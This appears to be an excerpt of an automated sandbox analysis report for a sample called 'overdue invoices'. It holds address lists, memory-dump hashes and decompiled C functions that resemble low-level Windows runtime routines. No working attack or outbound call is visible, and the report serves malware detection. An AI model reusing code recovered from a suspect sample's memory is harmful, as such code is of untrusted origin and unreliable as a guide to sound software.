                  0x009952dd
                  0x009952e7
                  0x009952f7
                  0x009952f9
                  0x009952fd
                  0x009f0dcf
                  0x009f0dd5
                  0x009f0dd6
                  0x009f0dd7
                  0x009f0dd8
                  0x009f0dd9
                  0x009f0dde
                  0x009f0ddf
                  0x009f0de0
                  0x009f0de1
                  0x009f0de2
                  0x009f0de5
                  0x009f0dea
                  0x009f0dec
                  0x009f0f60
                  0x009f0f64
                  0x009f0f70
                  0x009f0f76
                  0x009f0f79
                  0x009f0f79
                  0x00000000
                  0x009f0f64
                  0x009f0df2
                  0x009f0df7
                  0x009f0e04
                  0x009f0e0d
                  0x009f0e0d
                  0x009f0e10
                  0x009f0e1a
                  0x009f0e1c
                  0x009f0e4c
                  0x009f0e52
                  0x009f0e61
                  0x009f0e67
                  0x009f0e6b
                  0x009f0e70
                  0x009f0e76
                  0x009f0ed7
                  0x009f0edc
                  0x009f0ee0
                  0x009f0ee6
                  0x009f0eea
                  0x009f0eed
                  0x009f0ef0
                  0x009f0ef3
                  0x009f0ef6
                  0x009f0ef9
                  0x009f0efe
                  0x009f0f01
                  0x009f0f01
                  0x009f0f0b
                  0x009f0f12
                  0x009f0f16
                  0x009f0f18
                  0x009f0f1b
                  0x009f0f2c
                  0x009f0f31
                  0x009f0f31
                  0x009f0f35
                  0x009f0f39
                  0x009f0f3a
                  0x009f0f3c
                  0x009f0f3f
                  0x009f0f50
                  0x009f0f55
                  0x009f0f55
                  0x009f0f59
                  0x009952eb
                  0x009952f1
                  0x009952f1
                  0x009f0e7d
                  0x009f0e84
                  0x009f0e88
                  0x009f0e8a
                  0x009f0e8d
                  0x009f0e9e
                  0x009f0ea3
                  0x009f0ea3
                  0x009f0ea7
                  0x009f0eaf
                  0x009f0eb3
                  0x009f0eb9
                  0x009f0eb9
                  0x009f0ebc
                  0x009f0ecd
                  0x009f0ecd
                  0x00000000
                  0x009f0eb3
                  0x009f0e21
                  0x009f0e2b
                  0x009f0e2f
                  0x009f0e30
                  0x009f0e3a
                  0x009f0e3f
                  0x009f0e41
                  0x00000000
                  0x00000000
                  0x009f0e47
                  0x00000000
                  0x009f0e47
                  0x009f0df9
                  0x009f0dfe
                  0x00000000
                  0x00000000
                  0x00000000
                  0x009f0dfe
                  0x00995303
                  0x00995307
                  0x00000000
                  0x00995309
                  0x00000000
                  0x00995309
                  0x00995307
                  0x009952e9
                  0x009952e9
                  0x00000000
                  0x009952e9
                  0x0099530e
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e9ceb26cd301c2aae107aac60154e7869b74039c688fa1ecd00fbf8068eab93a
                  • Instruction ID: e89dcec2da7185708456db3e1134a59a3c9a4233d8ab078a656a3301fc162006
                  • Opcode Fuzzy Hash: e9ceb26cd301c2aae107aac60154e7869b74039c688fa1ecd00fbf8068eab93a
                  • Instruction Fuzzy Hash: 6C51CD30109741ABC721EF68C842B2BBBE8FF90710F24491AF4A587652EB74E804C792
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009C2AE4 Relevance: .2, Instructions: 159COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E009C2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0xa88204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0xa88208; // 0xa88207
				_t8 = _t57 + 0xa88208; // 0xa88207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0xa88450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0xa8821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0xa86d5c; // 0x7ffd0654
							_t72 =  *0xa86d5c; // 0x7ffd0654
							_t75 =  *0xa86d5c; // 0x7ffd0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0xa86d5c; // 0x7ffd0654
							_t84 =  *0xa86d5c; // 0x7ffd0654
							_t87 =  *0xa86d5c; // 0x7ffd0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E009DF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                  0x009c2ae4
                  0x009c2aec
                  0x009c2aef
                  0x009c2af4
                  0x009c2af7
                  0x009c2afd
                  0x009c2b92
                  0x009c2b92
                  0x009c2b97
                  0x009c2b9c
                  0x009c2b9c
                  0x009c2b03
                  0x009c2b06
                  0x009c2b09
                  0x009c2b09
                  0x009c2b0f
                  0x009c2b15
                  0x009c2b15
                  0x009c2b1b
                  0x009c2b1e
                  0x009c2b21
                  0x009c2b26
                  0x009c2b29
                  0x009c2b81
                  0x009c2b84
                  0x009c2c0e
                  0x009c2c15
                  0x009c2c24
                  0x009c2c24
                  0x009c2b8a
                  0x009c2b8a
                  0x009c2b8a
                  0x009c2b8a
                  0x009c2b90
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x009c2b4a
                  0x009c2b4a
                  0x009c2b4d
                  0x009c2b53
                  0x00000000
                  0x00000000
                  0x009c2b55
                  0x009c2b58
                  0x009c2bb7
                  0x00a05d1b
                  0x00a05d37
                  0x00a05d47
                  0x00a05d53
                  0x009c2bbd
                  0x009c2bbd
                  0x009c2bbd
                  0x009c2bb7
                  0x009c2b5d
                  0x009c2c2f
                  0x00a05d5b
                  0x00a05d77
                  0x00a05d87
                  0x00a05d93
                  0x009c2c35
                  0x009c2c35
                  0x009c2c35
                  0x009c2c2f
                  0x009c2b65
                  0x009c2b9f
                  0x009c2ba2
                  0x009c2b67
                  0x009c2b67
                  0x009c2b69
                  0x009c2b6b
                  0x009c2b6e
                  0x009c2bc9
                  0x009c2bcc
                  0x009c2bcf
                  0x009c2bd4
                  0x009c2bd6
                  0x009c2bd6
                  0x009c2bdb
                  0x009c2c02
                  0x009c2c05
                  0x009c2c07
                  0x00000000
                  0x009c2c07
                  0x009c2be0
                  0x009c2c00
                  0x009c2c3f
                  0x009c2c3f
                  0x00000000
                  0x009c2c00
                  0x009c2be5
                  0x009c2be7
                  0x009c2bec
                  0x009c2bf4
                  0x009c2bf6
                  0x00000000
                  0x009c2bf6
                  0x009c2b70
                  0x009c2b76
                  0x009c2b2b
                  0x009c2b2b
                  0x009c2b2d
                  0x009c2b2f
                  0x009c2b32
                  0x009c2b35
                  0x009c2b3a
                  0x00000000
                  0x009c2b40
                  0x009c2b43
                  0x009c2b45
                  0x009c2b47
                  0x009c2b4a
                  0x009c2b4d
                  0x009c2b53
                  0x00000000
                  0x00000000
                  0x00000000
                  0x009c2b53
                  0x009c2b78
                  0x009c2b78
                  0x009c2b7b
                  0x009c2b7e
                  0x00000000
                  0x009c2b7e
                  0x009c2b76
                  0x009c2ba5
                  0x009c2ba5
                  0x009c2ba8
                  0x009c2bad
                  0x00000000
                  0x00000000
                  0x009c2baf
                  0x009c2baf
                  0x009c2bc2
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1de7b39f82703ec7e7f653280f024f952791b8bfcb59ced285b6673d53050261
                  • Instruction ID: 9d1d097ec14546e1b68b55fb0789f42a9367611d27c3d23bf865f36e54d19756
                  • Opcode Fuzzy Hash: 1de7b39f82703ec7e7f653280f024f952791b8bfcb59ced285b6673d53050261
                  • Instruction Fuzzy Hash: 5151C076F001168FCB18CF1CC880ABDB7B1FB89700715845EE896AB364EB34AE41DB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009BDBE9 Relevance: .1, Instructions: 149COMMON
                  Download Yara Rule
                  C-Code - Quality: 86%
                  			E009BDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E0099CC50(E00994510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E009B7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E00A68ED6(_t102, _t98);
						}
						_t76 = _v44;
						E009B2280(_t58, _v44);
						E009BDD82(_v44, _t102, _t98);
						E009BB944(_t102, _v5);
						return L009AFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0xa88628; // 0x0
							_v28 = _t67;
							_t68 =  *0xa8862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0xa88628; // 0x0
						_t105 = _v28;
						_t80 =  *0xa8862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0xa5fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                  0x009bdbe9
                  0x009bdbf2
                  0x009bdbf7
                  0x009bdbf9
                  0x009bdbfc
                  0x009bdc00
                  0x009bdc03
                  0x009bdc14
                  0x009bdd54
                  0x009bdd54
                  0x009bdd54
                  0x009bdc18
                  0x009bdc1d
                  0x009bdc1d
                  0x009bdc32
                  0x009bdc3b
                  0x009bdc3e
                  0x009bdc46
                  0x009bdd5b
                  0x009bdd62
                  0x009bdd64
                  0x009bdd67
                  0x009bdd69
                  0x009bdd6b
                  0x009bdd6e
                  0x009bdd70
                  0x009bdd73
                  0x009bdd73
                  0x00000000
                  0x009bdc4c
                  0x009bdc4e
                  0x00a03ae3
                  0x00a03ae8
                  0x00a03aea
                  0x009bdce7
                  0x009bdce9
                  0x009bdcec
                  0x009bdcee
                  0x009bdcf0
                  0x009bdcf3
                  0x009bdcf5
                  0x00a03af2
                  0x00a03af5
                  0x00a03af5
                  0x009bdd06
                  0x009bdd08
                  0x009bdd0b
                  0x009bdd12
                  0x00a03b08
                  0x009bdd18
                  0x009bdd18
                  0x009bdd18
                  0x009bdd20
                  0x009bdd23
                  0x00a03b16
                  0x00a03b16
                  0x009bdd29
                  0x009bdd2d
                  0x009bdd36
                  0x009bdd40
                  0x009bdd51
                  0x009bdd51
                  0x009bdc54
                  0x009bdc59
                  0x009bdc59
                  0x009bdc5e
                  0x009bdc5e
                  0x009bdc63
                  0x009bdc66
                  0x009bdc6b
                  0x009bdc78
                  0x009bdc7b
                  0x009bdc81
                  0x009bdc81
                  0x009bdc83
                  0x009bdc89
                  0x00000000
                  0x00000000
                  0x009bdd7b
                  0x009bdd7b
                  0x009bdc8f
                  0x009bdc8f
                  0x009bdc92
                  0x009bdc99
                  0x009bdc9f
                  0x009bdca5
                  0x009bdcaa
                  0x009bdcaa
                  0x009bdcb3
                  0x009bdcb8
                  0x009bdcbb
                  0x009bdcc1
                  0x009bdccf
                  0x009bdcd2
                  0x009bdcd5
                  0x009bdcd7
                  0x009bdcda
                  0x009bdcdc
                  0x009bdcdc
                  0x009bdce2
                  0x009bdce4
                  0x00000000
                  0x009bdce4

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c128e3c676871aa62fac84d9874ec48c88c269d0254865d30d92c16c65cba883
                  • Instruction ID: 606897be734fc0774f8d57e0af88d9d399a9264bcab9e9ab9412d78585f896c2
                  • Opcode Fuzzy Hash: c128e3c676871aa62fac84d9874ec48c88c269d0254865d30d92c16c65cba883
                  • Instruction Fuzzy Hash: EB51A171A02205CFCB14CFA8C590B9EFBF5BF88320F208559D595A7380EB35AD44CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A6740D Relevance: .1, Instructions: 141COMMON
                  Download Yara Rule
                  C-Code - Quality: 84%
                  			E00A6740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E009ED4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E009DF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L009B4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L009B4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E009DF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L009B4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                  0x00a6740d
                  0x00a6740d
                  0x00a67412
                  0x00a67413
                  0x00a67416
                  0x00a67418
                  0x00a6741c
                  0x00a6741f
                  0x00a67422
                  0x00a67422
                  0x00a67428
                  0x00a6742a
                  0x00a6742a
                  0x00a67451
                  0x00a67432
                  0x00a6744f
                  0x00a6744f
                  0x00000000
                  0x00a67434
                  0x00a67438
                  0x00a67443
                  0x00a67517
                  0x00a67517
                  0x00a6751a
                  0x00a67535
                  0x00a67520
                  0x00a67527
                  0x00a6752c
                  0x00a67531
                  0x00a67533
                  0x00000000
                  0x00a67533
                  0x00000000
                  0x00a67531
                  0x00a6754b
                  0x00a6754f
                  0x00a6755c
                  0x00a6755c
                  0x00a6755f
                  0x00a67560
                  0x00a67561
                  0x00a67562
                  0x00a67563
                  0x00a67568
                  0x00a6756a
                  0x00a6756c
                  0x00a6756d
                  0x00a6756d
                  0x00a6756f
                  0x00a67572
                  0x00a67574
                  0x00a67577
                  0x00a6757c
                  0x00a6757f
                  0x00000000
                  0x00a67551
                  0x00a67551
                  0x00a67551
                  0x00a67553
                  0x00a67553
                  0x00a67449
                  0x00a67449
                  0x00a6744c
                  0x00a6744c
                  0x00000000
                  0x00a6744c
                  0x00a67443
                  0x00a6750e
                  0x00a67514
                  0x00a67514
                  0x00a67455
                  0x00a67469
                  0x00a6746d
                  0x00000000
                  0x00a67473
                  0x00a67473
                  0x00a67476
                  0x00a67480
                  0x00a67484
                  0x00a6748e
                  0x00a67493
                  0x00a67493
                  0x00a67496
                  0x00a67499
                  0x00a674a1
                  0x00a674b1
                  0x00a674b5
                  0x00000000
                  0x00a674bb
                  0x00a674c1
                  0x00a674c1
                  0x00a674c4
                  0x00a674c5
                  0x00a674c6
                  0x00a674c7
                  0x00a674c8
                  0x00a674cd
                  0x00000000
                  0x00a674d3
                  0x00a674d3
                  0x00a674d6
                  0x00a674d8
                  0x00a674db
                  0x00a674dd
                  0x00a674e0
                  0x00a674e7
                  0x00a674ee
                  0x00a674ee
                  0x00a674f4
                  0x00a674f9
                  0x00000000
                  0x00a674fb
                  0x00a674fb
                  0x00a674fd
                  0x00a67500
                  0x00a67503
                  0x00a67505
                  0x00a67505
                  0x00a674f9
                  0x00000000
                  0x00a674cd
                  0x00a674b5
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                  • Instruction ID: 83c264f87ea9a03d57849e894712f7c1ed062aeea9bae7dbd7ef520a302ab926
                  • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                  • Instruction Fuzzy Hash: 8E51BC71600606EFDB15CF14C481A9ABBB5FF45308F14C1BAE9099F222E771E946CBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009C2990 Relevance: .1, Instructions: 133COMMON
                  Download Yara Rule
                  C-Code - Quality: 97%
                  			E009C2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0xa6ff00);
				E009ED08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x971664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E009DE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x971668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E00A151BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x97166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E009C2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E009A6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
